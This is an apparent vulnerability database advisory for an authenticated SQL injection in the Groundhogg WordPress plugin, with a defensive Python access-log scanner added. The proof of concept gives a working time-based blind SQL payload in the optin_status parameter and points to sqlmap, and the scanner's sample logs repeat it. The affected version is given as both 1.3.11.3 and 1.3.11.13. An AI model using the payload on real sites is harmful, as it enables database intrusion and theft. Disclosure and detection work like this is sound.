Groundhogg <= 1.3.11.3 - Authenticated SQL Injection



Description
The WordPress Groundhogg plugin, in versions lower than 1.3.11.3, is affected by an authenticated SQL injection vulnerability.
Proof of Concept
# Exploit Title: Wordpress Groundhogg <= 1.3.11.13 Authenticated SQL Injection Vulnerability
# Date: 23-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 1.3.11.13
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
WordPress Groundhogg plugin with a version lower than 1.3.11.13 is affected by an Authenticated SQL Injection vulnerability.

2. Proof of Concept: 
 
Authenticated SQL Injection:
- Using a WordPress user, access <your target> /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.
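
A defender-side check for the request shape in the proof of concept, as an added example that is not part of the original advisory or the plugin's code: it scans web server access logs for `gh_export_contacts` requests whose `optin_status[]` values are not plain integers. The "combined" log format and the integer-only rule for legitimate values are assumptions, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [24/Oct/2019:10:01:12 +0000] "GET /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=1&optin_status%5B1%5D=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Oct/2019:10:03:40 +0000] "GET /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [24/Oct/2019:10:05:02 +0000] "GET /wp-admin/admin.php?page=gh_contacts&optin_status%5B0%5D=x HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d+")  # assumption: legitimate optin_status values are plain integers


def suspicious_optin_values(target):
    """Return non-integer optin_status[] values sent to the gh_export_contacts action."""
    url = urlsplit(target)
    if not url.path.endswith("/wp-admin/admin.php"):
        return []
    params = parse_qsl(url.query, keep_blank_values=True)  # percent-decodes keys and values
    single = dict(params)
    if single.get("page") != "gh_bulk_jobs" or single.get("action") != "gh_export_contacts":
        return []
    return [v for k, v in params
            if k.startswith("optin_status") and not INT_RE.fullmatch(v)]


def scan(log_text):
    """Return (client_ip, bad_values) for each log line that trips the check."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        bad = suspicious_optin_values(m.group("target"))
        if bad:
            hits.append((m.group("ip"), bad))
    return hits


if __name__ == "__main__":
    for ip, bad in scan(SAMPLE_LOG):
        print(ip, bad)
```

Access logs record only the query string, so this covers the GET form shown in the proof of concept; parameters sent in a request body would need a WAF or application-level log.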

References

URL https://nitesculucian.github.io/2019/10/23/groundhogg-1-3-2-authentificated-sql-injection-vulnerability/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Original Researcher Lucian Ioan Nitescu
Submitter Lucian Ioan Nitescu
Submitter Website https://nitesculucian.github.io/
Submitter Twitter https://twitter.com/LucianNitescu
Verified No
WPVDB ID 9924

Timeline

Publicly Published 2019-10-23 (about 2 months ago)
Added 2019-10-24 (about 2 months ago)
Last Updated 2019-11-28 (17 days ago)
